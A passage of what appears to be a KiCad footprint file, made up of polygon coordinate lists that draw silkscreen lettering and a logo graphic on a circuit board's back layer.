-9.108746 9.077829) (xy -9.146071 9.03115) (xy -9.237776 9.006249) (xy -9.270276 9.000859) (xy -9.38389 8.971639) (xy -9.465827 8.917331) (xy -9.522376 8.824859) (xy -9.559827 8.681146) (xy -9.58447 8.473113) (xy -9.594876 8.326018) (xy -9.622533 7.874) (xy -9.906 7.874) (xy -9.906 9.313333) (xy -9.757833 9.313333) (xy -9.658223 9.306152)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -19.473333 9.017) (xy -19.334752 9.017) (xy -19.270825 9.023043) (xy -19.211408 9.048679) (xy -19.14391 9.10517) (xy -19.05574 9.203777) (xy -18.934305 9.355763) (xy -18.885083 9.419166) (xy -18.752047 9.58935) (xy -18.656701 9.703234) (xy -18.585724 9.772093) (xy -18.525792 9.807201) (xy -18.463585 9.81983) (xy -18.409831 9.821333) (xy -18.305661 9.817559) (xy -18.24907 9.808167) (xy -18.245667 9.804825) (xy -18.270293 9.767326) (xy -18.337825 9.67596) (xy -18.438738 9.543343) (xy -18.563511 9.382089) (xy -18.601709 9.333163) (xy -18.957752 8.87801) (xy -18.601709 8.396829) (xy -18.473967 8.222796) (xy -18.366536 8.073777) (xy -18.288464 7.962532) (xy -18.248801 7.901819) (xy -18.245667 7.894824) (xy -18.283388 7.8827) (xy -18.378246 7.876835) (xy -18.425583 7.876849) (xy -18.502332 7.880273) (xy -18.563332 7.895313) (xy -18.621659 7.933343) (xy -18.690386 8.005742) (xy -18.782587 8.123884) (xy -18.911337 8.299147) (xy -18.912091 8.300182) (xy -19.04464 8.478971) (xy -19.141071 8.599108) (xy -19.213011 8.67186) (xy -19.272089 8.708496) (xy -19.329933 8.720282) (xy -19.346008 8.720666) (xy -19.473333 8.720666) (xy -19.473333 7.874) (xy -19.812 7.874) (xy -19.812 9.821333) (xy -19.473333 9.821333) (xy -19.473333 9.017)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -22.563667 7.874) (xy -22.86 7.874) (xy -22.86 9.948333) (xy -22.563667 9.948333) (xy -22.563667 7.874)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -23.243586 9.944973) (xy -23.180293 9.927771) (xy -23.158482 9.886043) (xy -23.156333 9.8425) (xy -23.175722 9.759986) (xy -23.243783 9.736666) (xy -23.387088 9.709728) (xy -23.469163 9.62553) (xy -23.495 9.481177) (xy -23.490864 9.373743) (xy -23.462161 9.326005) (xy -23.38445 9.313737) (xy -23.325667 9.313333) (xy -23.217089 9.308318) (xy -23.168822 9.281141) (xy -23.156601 9.213604) (xy -23.156333 9.186333) (xy -23.16302 9.1049) (xy -23.199257 9.068699) (xy -23.289306 9.059534) (xy -23.325667 9.059333) (xy -23.495 9.059333) (xy -23.495 7.874) (xy -23.788944 7.874) (xy -23.8125 9.038166) (xy -23.950083 9.051432) (xy -24.045528 9.07065) (xy -24.082534 9.120006) (xy -24.087667 9.189015) (xy -24.079129 9.272583) (xy -24.036442 9.306857) (xy -23.9395 9.313333) (xy -23.791333 9.313333) (xy -23.791333 9.526924) (xy -23.766 9.722894) (xy -23.686547 9.854952) (xy -23.547799 9.928277) (xy -23.369924 9.948333) (xy -23.243586 9.944973)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -7.62 7.874) (xy -7.750963 7.874) (xy -7.857527 7.89346) (xy -7.903044 7.954753) (xy -7.922346 8.009412) (xy -7.953374 8.00358) (xy -8.004914 7.954753) (xy -8.104337 7.892571) (xy -8.188038 7.874) (xy -8.292177 7.86732) (xy -8.346788 7.857247) (xy -8.425102 7.854821) (xy -8.536505 7.872083) (xy -8.540489 7.873014) (xy -8.681443 7.921689) (xy -8.769602 8.00058) (xy -8.827355 8.133178) (xy -8.842964 8.190359) (xy -8.883005 8.433093) (xy -8.887472 8.680656) (xy -8.886847 8.685719) (xy -8.587972 8.685719) (xy -8.587047 8.51101) (xy -8.563955 8.349997) (xy -8.521785 8.229137) (xy -8.486317 8.185156) (xy -8.370406 8.140585) (xy -8.220989 8.130778) (xy -8.081461 8.155804) (xy -8.024727 8.184393) (xy -7.971838 8.265536) (xy -7.934843 8.404514) (xy -7.917477 8.575373) (xy -7.923472 8.752158) (xy -7.933378 8.819414) (xy -7.995744 8.953543) (xy -8.114745 9.032445) (xy -8.27814 9.050132) (xy -8.372518 9.034185) (xy -8.482771 8.991984) (xy -8.540873 8.918117) (xy -8.563644 8.847666) (xy -8.587972 8.685719) (xy -8.886847 8.685719) (xy -8.858966 8.911394) (xy -8.800086 9.103657) (xy -8.717918 9.231415) (xy -8.60924 9.290033) (xy -8.453088 9.31674) (xy -8.280304 9.311796) (xy -8.121731 9.27546) (xy -8.027876 9.225594) (xy -7.916333 9.137855) (xy -7.916333 9.948333) (xy -7.62 9.948333) (xy -7.62 7.874)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -10.828218 9.311764) (xy -10.691196 9.304667) (xy -10.599437 9.288456) (xy -10.53325 9.259548) (xy -10.472945 9.214358) (xy -10.469277 9.211217) (xy -10.423093 9.169353) (xy -10.390427 9.126434) (xy -10.368516 9.067546) (xy -10.354596 8.977774) (xy -10.345905 8.842203) (xy -10.339679 8.645919) (xy -10.335947 8.491551) (xy -10.321395 7.874) (xy -10.473531 7.874) (xy -10.576397 7.882281) (xy -10.619025 7.916644) (xy -10.625667 7.966046) (xy -10.625667 8.058092) (xy -10.720917 7.971548) (xy -10.843277 7.903514) (xy -11.012789 7.862336) (xy -11.19428 7.855087) (xy -11.260667 7.862976) (xy -11.417212 7.925379) (xy -11.515361 8.048387) (xy -11.555783 8.232941) (xy -11.557 8.278856) (xy -11.553103 8.343664) (xy -11.256206 8.343664) (xy -11.253224 8.293079) (xy -11.231472 8.190852) (xy -11.175815 8.142616) (xy -11.1125 8.126449) (xy -10.925368 8.117982) (xy -10.775892 8.161745) (xy -10.681857 8.252391) (xy -10.679636 8.256648) (xy -10.627594 8.379866) (xy -10.629747 8.455675) (xy -10.695053 8.494781) (xy -10.832472 8.50789) (xy -10.89025 8.508352) (xy -11.072499 8.501862) (xy -11.184773 8.477867) (xy -11.241275 8.427942) (xy -11.256206 8.343664) (xy -11.553103 8.343664) (xy -11.546657 8.450844) (xy -11.507096 8.569843) (xy -11.425522 8.646046) (xy -11.289138 8.689648) (xy -11.085151 8.710843) (xy -11.010434 8.714295) (xy -10.828879 8.722404) (xy -10.715791 8.732895) (xy -10.655004 8.750533) (xy -10.630352 8.780083) (xy -10.625668 8.826309) (xy -10.625667 8.827688) (xy -10.642386 8.930222) (xy -10.700475 8.99889) (xy -10.811831 9.039319) (xy -10.98835 9.057135) (xy -11.115524 9.059333) (xy -11.472333 9.059333) (xy -11.472333 9.313333) (xy -11.030194 9.313333) (xy -10.828218 9.311764)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -12.311698 9.306379) (xy -12.1382 9.277836) (xy -12.020458 9.21618) (xy -11.947961 9.10989) (xy -11.910199 8.947441) (xy -11.896659 8.717313) (xy -11.895667 8.59443) (xy -11.901346 8.340003) (xy -11.920619 8.157187) (xy -11.956836 8.033546) (xy -12.013351 7.956647) (xy -12.077579 7.919598) (xy -12.226677 7.882696) (xy -12.420633 7.860176) (xy -12.620459 7.854669) (xy -12.787166 7.868803) (xy -12.798526 7.870988) (xy -12.931548 7.917292) (xy -13.04264 7.986788) (xy -13.052526 7.996044) (xy -13.091678 8.04193) (xy -13.117863 8.097824) (xy -13.133652 8.180553) (xy -13.141614 8.306945) (xy -13.144315 8.493826) (xy -13.144491 8.593666) (xy -12.869333 8.593666) (xy -12.864163 8.389375) (xy -12.841816 8.255073) (xy -12.792042 8.17637) (xy -12.704588 8.138872) (xy -12.569204 8.128187) (xy -12.537644 8.128) (xy -12.395648 8.136351) (xy -12.285463 8.157893) (xy -12.2428 8.1788) (xy -12.216566 8.247535) (xy -12.199586 8.375192) (xy -12.191861 8.536533) (xy -12.193391 8.70632) (xy -12.204176 8.859316) (xy -12.224216 8.970284) (xy -12.2428 9.008533) (xy -12.310738 9.036353) (xy -12.432678 9.054805) (xy -12.537644 9.059333) (xy -12.683159 9.052074) (xy -12.77882 9.020701) (xy -12.83488 8.950822) (xy -12.86159 8.828043) (xy -12.8692 8.637974) (xy -12.869333 8.593666) (xy -13.144491 8.593666) (xy -13.1445 8.598508) (xy -13.143882 8.813808) (xy -13.139839 8.961371) (xy -13.12909 9.058126) (xy -13.108352 9.121002) (xy -13.074344 9.166928) (xy -13.025723 9.211165) (xy -12.956649 9.262362) (xy -12.880563 9.293046) (xy -12.773943 9.308284) (xy -12.613269 9.313142) (xy -12.551465 9.313333) (xy -12.311698 9.306379)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -14.478 9.137855) (xy -14.366458 9.225594) (xy -14.238619 9.285755) (xy -14.069497 9.314566) (xy -13.892289 9.31137) (xy -13.74019 9.27551) (xy -13.676267 9.23925) (xy -13.5961 9.129099) (xy -13.540585 8.962336) (xy -13.509562 8.75957) (xy -13.502871 8.541409) (xy -13.520352 8.328462) (xy -13.561844 8.141338) (xy -13.627187 8.000646) (xy -13.686351 7.941255) (xy -13.855333 7.874743) (xy -14.060747 7.85405) (xy -14.1605 7.862206) (xy -14.28759 7.906018) (xy -14.38275 7.969436) (xy -14.478 8.058092) (xy -14.478 7.966046) (xy -14.492142 7.903185) (xy -14.550367 7.877608) (xy -14.626167 7.874) (xy -14.774333 7.874) (xy -14.774333 8.619513) (xy -14.478 8.619513) (xy -14.461964 8.390612) (xy -14.414169 8.237634) (xy -14.335083 8.161961) (xy -14.321654 8.157644) (xy -14.129969 8.132497) (xy -13.97093 8.159379) (xy -13.885333 8.212666) (xy -13.838075 8.277229) (xy -13.811921 8.367652) (xy -13.801576 8.507765) (xy -13.800667 8.593666) (xy -13.814722 8.805367) (xy -13.861536 8.946591) (xy -13.948084 9.027505) (xy -14.081341 9.058278) (xy -14.120091 9.059333) (xy -14.288059 9.025827) (xy -14.403814 8.926128) (xy -14.466356 8.761465) (xy -14.478 8.619513) (xy -14.774333 8.619513) (xy -14.774333 9.948333) (xy -14.478 9.948333) (xy -14.478 9.137855)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -17.228695 9.305353) (xy -17.09442 9.283076) (xy -17.053967 9.267592) (xy -16.958956 9.172726) (xy -16.889818 9.013216) (xy -16.852988 8.806823) (xy -16.848667 8.70086) (xy -16.848667 8.466666) (xy -17.78 8.466666) (xy -17.78 8.348133) (xy -17.770167 8.253279) (xy -17.731598 8.189889) (xy -17.650687 8.151915) (xy -17.513826 8.133311) (xy -17.307412 8.128028) (xy -17.2847 8.128) (xy -17.100755 8.127253) (xy -16.985448 8.122103) (xy -16.922749 8.108188) (xy -16.896629 8.081145) (xy -16.89106 8.03661) (xy -16.891 8.020838) (xy -16.909439 7.934043) (xy -16.943917 7.897412) (xy -17.053603 7.877907) (xy -17.215842 7.864825) (xy -17.398691 7.859227) (xy -17.570206 7.862176) (xy -17.686676 7.872727) (xy -17.835217 7.907498) (xy -17.939116 7.966376) (xy -18.006695 8.063265) (xy -18.046277 8.212066) (xy -18.066184 8.426679) (xy -18.069799 8.512715) (xy -18.071494 8.774501) (xy -18.06831 8.808116) (xy -17.78 8.808116) (xy -17.773135 8.763464) (xy -17.740792 8.73727) (xy -17.665347 8.72468) (xy -17.529178 8.720841) (xy -17.4625 8.720666) (xy -17.300383 8.722557) (xy -17.205281 8.731466) (xy -17.159573 8.752246) (xy -17.145634 8.789751) (xy -17.145 8.808116) (xy -17.164459 8.940219) (xy -17.231316 9.019012) (xy -17.358294 9.054561) (xy -17.4625 9.059333) (xy -17.629458 9.043937) (xy -17.72904 8.991037) (xy -17.773969 8.890568) (xy -17.78 8.808116) (xy -18.06831 8.808116) (xy -18.053282 8.966721) (xy -18.011329 9.102939) (xy -17.941801 9.196717) (xy -17.860806 9.25183) (xy -17.748383 9.285435) (xy -17.585605 9.305947) (xy -17.402399 9.312781) (xy -17.228695 9.305353)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -21.290707 9.305565) (xy -21.156356 9.282595) (xy -21.117967 9.267592) (xy -21.022956 9.172726) (xy -20.953818 9.013216) (xy -20.916988 8.806823) (xy -20.912667 8.70086) (xy -20.912667 8.466666) (xy -21.844 8.466666) (xy -21.844 8.341156) (xy -21.829634 8.250229) (xy -21.778395 8.188403) (xy -21.678073 8.150734) (xy -21.516457 8.132277) (xy -21.317617 8.128) (xy -21.142562 8.127077) (xy -21.035473 8.12102) (xy -20.979651 8.104892) (xy -20.958393 8.073758) (xy -20.955001 8.022683) (xy -20.955 8.020838) (xy -20.973439 7.934043) (xy -21.007917 7.897412) (xy -21.117603 7.877907) (xy -21.279842 7.864825) (xy -21.462691 7.859227) (xy -21.634206 7.862176) (xy -21.750676 7.872727) (xy -21.904175 7.909966) (xy -22.010259 7.974344) (xy -22.077937 8.080011) (xy -22.116216 8.241116) (xy -22.134105 8.471808) (xy -22.134238 8.475183) (xy -22.13504 8.759087) (xy -22.127611 8.823476) (xy -21.844 8.823476) (xy -21.839676 8.771169) (xy -21.814822 8.740507) (xy -21.751618 8.725717) (xy -21.632243 8.72103) (xy -21.5265 8.720666) (xy -21.209 8.720666) (xy -21.209 8.8392) (xy -21.229473 8.957935) (xy -21.299362 9.027349) (xy -21.431376 9.056712) (xy -21.510776 9.059333) (xy -21.69004 9.036204) (xy -21.800154 8.965834) (xy -21.843198 8.846752) (xy -21.844 8.823476) (xy -22.127611 8.823476) (xy -22.110552 8.971326) (xy -22.05815 9.121812) (xy -21.975208 9.220456) (xy -21.929144 9.249587) (xy -21.814292 9.28443) (xy -21.649631 9.305818) (xy -21.465118 9.313084) (xy -21.290707 9.305565)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -24.75781 9.306393) (xy -24.58436 9.277895) (xy -24.466618 9.216319) (xy -24.394089 9.110147) (xy -24.356275 8.94786) (xy -24.34268 8.717941) (xy -24.341667 8.593666) (xy -24.347999 8.342363) (xy -24.369479 8.161756) (xy -24.409828 8.038653) (xy -24.47277 7.959857) (xy -24.530368 7.924855) (xy -24.663984 7.886427) (xy -24.845818 7.86188) (xy -25.040165 7.853907) (xy -25.211318 7.865203) (xy -25.244526 7.870988) (xy -25.377548 7.917292) (xy -25.48864 7.986788) (xy -25.498526 7.996044) (xy -25.537678 8.04193) (xy -25.563863 8.097824) (xy -25.579652 8.180553) (xy -25.587614 8.306945) (xy -25.590315 8.493826) (xy -25.590491 8.593666) (xy -25.315333 8.593666) (xy -25.310163 8.389375) (xy -25.287816 8.255073) (xy -25.238042 8.17637) (xy -25.150588 8.138872) (xy -25.015204 8.128187) (xy -24.983644 8.128) (xy -24.841648 8.136351) (xy -24.731463 8.157893) (xy -24.6888 8.1788) (xy -24.662566 8.247535) (xy -24.645586 8.375192) (xy -24.637861 8.536533) (xy -24.639391 8.70632) (xy -24.650176 8.859316) (xy -24.670216 8.970284) (xy -24.6888 9.008533) (xy -24.756738 9.036353) (xy -24.878678 9.054805) (xy -24.983644 9.059333) (xy -25.129159 9.052074) (xy -25.22482 9.020701) (xy -25.28088 8.950822) (xy -25.30759 8.828043) (xy -25.3152 8.637974) (xy -25.315333 8.593666) (xy -25.590491 8.593666) (xy -25.5905 8.598508) (xy -25.589882 8.813808) (xy -25.585839 8.961371) (xy -25.57509 9.058126) (xy -25.554352 9.121002) (xy -25.520344 9.166928) (xy -25.471723 9.211165) (xy -25.402649 9.262362) (xy -25.326563 9.293046) (xy -25.219943 9.308284) (xy -25.059269 9.313142) (xy -24.997465 9.313333) (xy -24.75781 9.306393)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -26.391535 9.81802) (xy -26.227304 9.808394) (xy -26.122273 9.788007) (xy -26.063742 9.753149) (xy -26.03901 9.700111) (xy -26.035 9.647456) (xy -26.035 9.525786) (xy -26.47593 9.533539) (xy -26.709888 9.533759) (xy -26.871633 9.520791) (xy -26.973311 9.488656) (xy -27.027068 9.431375) (xy -27.04505 9.342968) (xy -27.042513 9.254616) (xy -27.033974 9.177153) (xy -27.012771 9.12182) (xy -26.965506 9.082792) (xy -26.878778 9.054247) (xy -26.73919 9.030362) (xy -26.53334 9.005314) (xy -26.446369 8.995553) (xy -26.234136 8.951062) (xy -26.087723 8.870297) (xy -26.086535 8.86928) (xy -26.02773 8.811913) (xy -25.993287 8.749821) (xy -25.976768 8.659304) (xy -25.971738 8.516659) (xy -25.9715 8.445693) (xy -25.973475 8.279216) (xy -25.98451 8.172545) (xy -26.012271 8.100827) (xy -26.064425 8.039213) (xy -26.109751 7.997527) (xy -26.217096 7.920189) (xy -26.317545 7.87686) (xy -26.342585 7.873534) (xy -26.451615 7.869115) (xy -26.582931 7.859109) (xy -26.585333 7.85888) (xy -26.706903 7.853907) (xy -26.87326 7.855305) (xy -27.01925 7.86128) (xy -27.305 7.877868) (xy -27.305 8.168065) (xy -26.913417 8.145505) (xy -26.673711 8.137944) (xy -26.504983 8.150935) (xy -26.394939 8.189713) (xy -26.331288 8.259511) (xy -26.301736 8.365567) (xy -26.297488 8.407817) (xy -26.302481 8.540726) (xy -26.33629 8.62028) (xy -26.339821 8.623349) (xy -26.404673 8.647893) (xy -26.531084 8.676383) (xy -26.696394 8.704052) (xy -26.772472 8.714344) (xy -27.006126 8.75262) (xy -27.169173 8.805152) (xy -27.275551 8.881664) (xy -27.339199 8.991881) (xy -27.372207 9.132799) (xy -27.377001 9.361508) (xy -27.322892 9.556422) (xy -27.215274 9.701769) (xy -27.165111 9.738533) (xy -27.079864 9.779797) (xy -26.974895 9.805003) (xy -26.828359 9.817487) (xy -26.627667 9.820597) (xy -26.391535 9.81802)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -16.164203 8.780666) (xy -16.154155 8.526723) (xy -16.135456 8.346327) (xy -16.102002 8.228393) (xy -16.047686 8.16184) (xy -15.966403 8.135584) (xy -15.852047 8.138543) (xy -15.812985 8.143134) (xy -15.705822 8.164128) (xy -15.630326 8.203788) (xy -15.581064 8.275283) (xy -15.552601 8.39178) (xy -15.539502 8.566446) (xy -15.536334 8.812447) (xy -15.536333 8.813424) (xy -15.536333 9.313333) (xy -15.24 9.313333) (xy -15.24 8.490589) (xy -15.242033 8.228257) (xy -15.24769 7.98919) (xy -15.256311 7.788556) (xy -15.267237 7.641519) (xy -15.279807 7.563246) (xy -15.280444 7.56147) (xy -15.350871 7.446661) (xy -15.467689 7.368574) (xy -15.643177 7.321732) (xy -15.862941 7.301698) (xy -16.034846 7.297526) (xy -16.184388 7.299586) (xy -16.282474 7.307392) (xy -16.290246 7.308872) (xy -16.361974 7.344193) (xy -16.37685 7.422782) (xy -16.374913 7.443355) (xy -16.365182 7.498694) (xy -16.339981 7.532666) (xy -16.281728 7.551093) (xy -16.172841 7.559797) (xy -16.009703 7.56429) (xy -15.834121 7.573909) (xy -15.691853 7.592432) (xy -15.606009 7.616606) (xy -15.596953 7.622391) (xy -15.555752 7.701692) (xy -15.537388 7.838917) (xy -15.536982 7.8686) (xy -15.543092 7.973024) (xy -15.557954 8.021896) (xy -15.568732 8.017921) (xy -15.672736 7.933878) (xy -15.841967 7.884923) (xy -15.996856 7.874) (xy -16.156238 7.887058) (xy -16.271876 7.934042) (xy -16.327723 7.976116) (xy -16.373907 8.01798) (xy -16.406573 8.060899) (xy -16.428484 8.119787) (xy -16.442404 8.209559) (xy -16.451095 8.34513) (xy -16.457322 8.541414) (xy -16.461053 8.695782) (xy -16.475606 9.313333) (xy -16.178239 9.313333) (xy -16.164203 8.780666)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -7.789333 5.037666) (xy -8.128 5.037666) (xy -8.128 5.799666) (xy -8.129186 6.043086) (xy -8.132479 6.254333) (xy -8.137486 6.42005) (xy -8.143811 6.526876) (xy -8.150527 6.561666) (xy -8.200543 6.546803) (xy -8.296517 6.509917) (xy -8.32503 6.498166) (xy -8.437076 6.452512) (xy -8.490966 6.445049) (xy -8.507842 6.484299) (xy -8.508844 6.57225) (xy -8.502103 6.648175) (xy -8.471019 6.705584) (xy -8.398985 6.761638) (xy -8.269396 6.833499) (xy -8.242587 6.847416) (xy -8.095482 6.916823) (xy -7.966129 6.966269) (xy -7.88291 6.985) (xy -7.789333 6.985) (xy -7.789333 5.037666)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy -9.395631 6.471234) (xy -9.374287 6.448765) (xy -9.372157 6.399674) (xy -9.390781 6.313785) (xy -9.431699 6.180926) (xy -9.496453 5.990921) (xy -9.586583 5.733597) (xy -9.614361 5.654419) (xy -9.830574 5.037666) (xy -10.027037 5.038024) (xy -10.2235 5.038381) (xy -10.45215 5.704774) (xy -10.529797 5.93086) (xy -10.598667 6.130993) (xy -10.653708 6.290522) (xy -10.689867 6.394796) (xy -10.701206 6.426975) (xy -10.691972 6.462958) (xy -10.619034 6.472649) (xy -10.560495 6.469308) (xy -10.399378 6.455833) (xy -10.20886 5.884333) (xy -10.018341 5.312833) (xy -9.825721 5.894916) (xy -9.6331 6.477) (xy -9.489794 6.477) (xy -9.434647 6.477254) (xy -9.395631 6.471234)) (layer B.SilkS) (width 0.01)) (fp_poly (pts (xy 5.525076 14.710217) (xy 5.617448 14.593052) (xy 5.671753 14.491654) (xy 5.737128 14.296193) (xy 5.764176 14.063362) (xy 5.752229 13.78537) (xy 5.700618 13.454427) (xy 5.608674 13.062741) (xy 5.522913 12.758195) (xy 5.511594 12.707761) (xy 5.528908 12.68754) (xy 5.592582 12.694689) (xy 5.720341 12.72636) (xy 5.720668 12.726445) (xy 5.940047 12.772426) (xy 6.112629 12.779426) (xy 6.266837 12.747327) (xy 6.328686 12.723956) (xy 6.454372 12.636295) (xy 6.510363 12.518207) (xy 6.498076 12.385218) (xy 6.418927 12.252852) (xy 6.275138 12.137104) (xy 6.169224 12.088043) (xy 6.011041 12.029611) (xy 5.830538 11.972644) (xy 5.785357 11.95988) (xy 5.538844 11.887042) (xy 5.360918 11.819921) (xy 5.236743 11.749753) (xy 5.151488 11.667773) (xy 5.090319 11.565217) (xy 5.080512 11.543411) (xy 5.050789 11.452122) (xy 5.014174 11.306093) (xy 4.97391 11.122815) (xy 4.933241 10.919777) (xy 4.89541 10.714469) (xy 4.86366 10.524381) (xy 4.841235 10.367003) (xy 4.831376 10.259824) (xy 4.835334 10.221222) (xy 4.880321 10.220754) (xy 4.992219 10.229736) (xy 5.154055 10.246118) (xy 5.348859 10.26785) (xy 5.559657 10.292884) (xy 5.769479 10.31917) (xy 5.961353 10.344658) (xy 6.118306 10.367301) (xy 6.223367 10.385049) (xy 6.25475 10.392605) (xy 6.302672 10.387285) (xy 6.307667 10.372721) (xy 6.343614 10.333351) (xy 6.442086 10.265532) (xy 6.589025 10.176923) (xy 6.770374 10.075182) (xy 6.972075 9.967968) (xy 7.180072 9.862939) (xy 7.380307 9.767754) (xy 7.558723 9.690072) (xy 7.566352 9.686973) (xy 7.78069 9.606358) (xy 8.011065 9.529407) (xy 8.21756 9.46919) (xy 8.275436 9.454804) (xy 8.44547 9.408358) (xy 8.555587 9.363475) (xy 8.593667 9.325884) (xy 8.622441 9.275359) (xy 8.640799 9.271) (xy 8.652106 9.23049) (xy 8.660191 9.116121) (xy 8.665175 8.938635) (xy 8.667181 8.708773) (xy 8.666329 8.437277) (xy 8.662743 8.134889) (xy 8.656544 7.81235) (xy 8.647853 7.480402) (xy 8.636794 7.149787) (xy 8.623487 6.831246) (xy 8.610173 6.57225) (xy 8.585519 6.138333) (xy 8.69968 6.138333) (xy 8.808406 6.146916) (xy 8.974633 6.170162) (xy 9.179129 6.204318) (xy 9.402662 6.245632) (xy 9.626 6.29035) (xy 9.829912 6.334719) (xy 9.995167 6.374987) (xy 10.102532 6.4074) (xy 10.12248 6.415989) (xy 10.20247 6.469393) (xy 10.269505 6.547082) (xy 10.330735 6.663112) (xy 10.39331 6.831542) (xy 10.464382 7.066427) (xy 10.478179 7.115244) (xy 10.560521 7.382179) (xy 10.639742 7.576963) (xy 10.722537 7.711542) (xy 10.815603 7.79786) (xy 10.879791 7.831718) (xy 11.016137 7.853275) (xy 11.129015 7.804174) (xy 11.214494 7.696139) (xy 11.268641 7.540894) (xy 11.287524 7.350164) (xy 11.267212 7.135672) (xy 11.203772 6.909144) (xy 11.195969 6.88896) (xy 11.184425 6.840543) (xy 11.21894 6.836626) (xy 11.287584 6.860311) (xy 11.470328 6.91942) (xy 11.700932 6.978885) (xy 11.952405 7.033251) (xy 12.197757 7.077064) (xy 12.409997 7.104872) (xy 12.532938 7.111945) (xy 12.727602 7.094235) (xy 12.920875 7.046681) (xy 13.090998 6.977759) (xy 13.216211 6.895945) (xy 13.270287 6.824729) (xy 13.25998 6.749603) (xy 13.197782 6.670362) (xy 13.110288 6.614646) (xy 13.057899 6.604) (xy 12.978977 6.589681) (xy 12.885916 6.559924) (xy 12.769986 6.515847) (xy 12.914456 6.443507) (xy 13.03504 6.350339) (xy 13.107331 6.228529) (xy 13.117265 6.104244) (xy 13.109925 6.079787) (xy 13.055558 6.030417) (xy 12.934718 6.010763) (xy 12.902412 6.010046) (xy 12.795851 6.006431) (xy 12.763451 5.99421) (xy 12.794776 5.968183) (xy 12.805833 5.961931) (xy 12.968605 5.846354) (xy 13.058421 5.724158) (xy 13.072111 5.603297) (xy 13.006503 5.491723) (xy 12.996901 5.482681) (xy 12.898766 5.425412) (xy 12.7624 5.40571) (xy 12.571058 5.422034) (xy 12.488333 5.435913) (xy 12.297833 5.470716) (xy 12.410344 5.381191) (xy 12.499547 5.319943) (xy 12.564579 5.291858) (xy 12.567765 5.291666) (xy 12.593697 5.259228) (xy 12.569313 5.161084) (xy 12.523505 5.055408) (xy 12.496461 5.009695) (xy 12.456911 4.988431) (xy 12.383645 4.989352) (xy 12.255454 5.010194) (xy 12.199063 5.020757) (xy 11.973491 5.068713) (xy 11.802921 5.121038) (xy 11.658014 5.189523) (xy 11.509432 5.285959) (xy 11.472333 5.312833) (xy 11.380092 5.380016) (xy 11.299826 5.432305) (xy 11.220666 5.470112) (xy 11.131743 5.493846) (xy 11.022187 5.50392) (xy 10.88113 5.500741) (xy 10.697703 5.484723) (xy 10.461036 5.456273) (xy 10.160261 5.415804) (xy 9.857318 5.373821) (xy 9.547514 5.331006) (xy 9.264742 5.292257) (xy 9.019942 5.259047) (xy 8.824052 5.232848) (xy 8.688009 5.215133) (xy 8.622752 5.207373) (xy 8.619211 5.207146) (xy 8.613818 5.166075) (xy 8.609477 5.048037) (xy 8.606138 4.860723) (xy 8.603752 4.611825) (xy 8.60227 4.309035) (xy 8.601645 3.960044) (xy 8.601826 3.572545) (xy 8.602765 3.15423) (xy 8.604412 2.71279) (xy 8.60672 2.255917) (xy 8.609639 1.791303) (xy 8.61312 1.32664) (xy 8.617114 0.86962) (xy 8.621573 0.427934) (xy 8.626447 0.009275) (xy 8.631688 -0.378666) (xy 8.637246 -0.728197) (xy 8.643073 -1.031626) (xy 8.64912 -1.281261) (xy 8.655338 -1.469411) (xy 8.661677 -1.588383) (xy 8.662483 -1.598084) (xy 8.674196 -1.758625) (xy 8.672502 -1.852072) (xy 8.655295 -1.895239) (xy 8.624049 -1.905) (xy 8.557024 -1.930452) (xy 8.542921 -1.951404) (xy 8.510131 -1.966496) (xy 8.420079 -1.974535) (xy 8.266625 -1.975502) (xy 8.043628 -1.96938) (xy 7.744951 -1.956149) (xy 7.597476 -1.948574) (xy 7.390488 -1.939591) (xy 7.109014 -1.930385) (xy 6.763236 -1.921154) (xy 6.363332 -1.912093) (xy 5.919484 -1.903399) (xy 5.441872 -1.895269) (xy 4.940675 -1.887897) (xy 4.426075 -1.881481) (xy 3.908251 -1.876217) (xy 3.79276 -1.875215) (xy 0.918021 -1.85109) (xy 0.946662 -2.523628) (xy 0.959287 -2.815115) (xy 0.973486 -3.134962) (xy 0.987663 -3.447648) (xy 1.000222 -3.717657) (xy 1.002189 -3.759011) (xy 1.029073 -4.321856) (xy 1.138953 -4.301661) (xy 1.382776 -4.260124) (xy 1.607692 -4.227841) (xy 1.797474 -4.20664) (xy 1.935898 -4.198348) (xy 2.00516 -4.204132) (xy 2.054266 -4.265541) (xy 2.07189 -4.3891) (xy 2.06065 -4.559463) (xy 2.023166 -4.761285) (xy 1.962057 -4.979218) (xy 1.879942 -5.197919) (xy 1.810444 -5.345018) (xy 1.740317 -5.479911) (xy 1.686494 -5.584072) (xy 1.660161 -5.635851) (xy 1.659788 -5.636632) (xy 1.694693 -5.646119) (xy 1.799442 -5.653269) (xy 1.959234 -5.657534) (xy 2.159264 -5.658365) (xy 2.230984 -5.657799) (xy 2.55801 -5.658078) (xy 2.813127 -5.668088) (xy 3.008727 -5.689715) (xy 3.157205 -5.724845) (xy 3.270952 -5.775362) (xy 3.344132 -5.82716) (xy 3.448292 -5.962417) (xy 3.47271 -6.125139) (xy 3.417387 -6.314337) (xy 3.344008 -6.443044) (xy 3.205309 -6.617673) (xy 3.03495 -6.764368) (xy 2.824997 -6.885816) (xy 2.567517 -6.984705) (xy 2.254576 -7.063723) (xy 1.878239 -7.125557) (xy 1.430573 -7.172896) (xy 1.122556 -7.195579) (xy 0.770313 -7.216687) (xy 0.490941 -7.229564) (xy 0.27303 -7.234107) (xy 0.105175 -7.230211) (xy -0.02403 -7.217769) (xy -0.125994 -7.196678) (xy -0.167905 -7.183694) (xy -0.285911 -7.118065) (xy -0.373788 -7.02709) (xy -0.377828 -7.020249) (xy -0.40622 -6.958608) (xy -0.416573 -6.891859) (xy -0.411013 -6.834673) (xy -0.117712 -6.834673) (xy -0.113886 -6.873449) (xy -0.094448 -6.899496) (xy -0.051157 -6.91811) (xy 0.028166 -6.930447) (xy 0.155696 -6.937661) (xy 0.343611 -6.940908) (xy 0.601921 